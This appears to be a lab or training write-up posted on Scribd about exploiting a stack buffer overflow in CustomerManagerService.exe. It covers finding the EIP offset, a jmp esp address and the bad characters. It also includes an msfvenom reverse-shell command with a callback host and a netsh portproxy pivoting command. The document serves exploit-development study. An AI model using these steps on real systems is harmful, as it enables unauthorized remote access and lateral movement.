Scribd
Upload
15 views7 pages

Bo F

An nmap scan revealed that port 42424 is open on a local Windows machine running CustomerManagerService.exe. The program was analyzed using Immunity Debugger, leading to the discovery of an access violation error and the EIP value, which was then confirmed by overwriting it with 'BBBB'. The final exploit was crafted using msfvenom for a reverse shell, and network pivoting was established to exploit a remote server.

Uploaded by

furious fighters
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
15 views7 pages

Bo F

An nmap scan revealed that port 42424 is open on a local Windows machine running CustomerManagerService.exe. The program was analyzed using Immunity Debugger, leading to the discovery of an access violation error and the EIP value, which was then confirmed by overwriting it with 'BBBB'. The final exploit was crafted using msfvenom for a reverse shell, and network pivoting was established to exploit a remote server.

Uploaded by

furious fighters
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 7

After performing an nmap scan on our local windows machine (192.168.60.

29),
we discovered port 42424 is opened.

The CustomerManagerService.exe application just starts a server and waits for


incoming connections.

Let's start immunity debugger and start analyzing the program. Let's attach the
CustomerManagerService.exe program to immunity debugger.
The first thing we have to do is find the value of the eip. We first generate some
cyclical values with the msf-pattern_create tool and send to the program to see
how it responds.

We realize after sending the data, the program crashes and we encounter and
access violation error which is a good sign for an attacker. We found the eip
value sitting at ⇒ 39654138
Now we need to find the offset which is the exact point at which the program
crashes. Offset value ⇒ 146

Now we will try to overwrite the eip with “BBBB” just to confirm the offset we
have is the right value. We will use the below script to overwrite the eip.
Mona command ⇒ !mona jmp -r esp jmp address ⇒ 0x080414C3 ||
0x080416BF

We set a break point at the jmp address before running the script.

We will use one of the addresses as a jmp pointer and write the jmp to the eip.
After running the script we observe that the program pauses at our jmp address
waiting for further instructions.
After running the script, we hit the break point at 0X080416BF.

We discovered two bad characters that might cause problems. Bad chars ⇒
x00\x0a.
After finding the bad characters we use msfvenom in creating our final
shellcode we will send to the target to get a reverse shell. Command ⇒
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.60.29
LPORT=9001 -b
"\x00\x0a" -f py

Running our final exploit.

Getting a callback to our netcat listener.

Now as we exploited local machine it is time to exploit the remote server which
is 10.185.10.55 but for that we first need to pivot the network so that we can
send payload from our local machine

We need to create a connection between the developer machine that is


10.185.10.34 and the webserver that is 10.90.60.80. Command ⇒ netsh
interface portproxy add v4tov4 listenaddress=10.185.10.34 listenport=3434
connectaddress=10.90.60.80 connectport=3333
After connecting the developer host that is 10.185.10.34 to the webserver that is
10.90.60.80 we need to connect the webserver to the attacker ip that is
172.16.40.5.

You might also like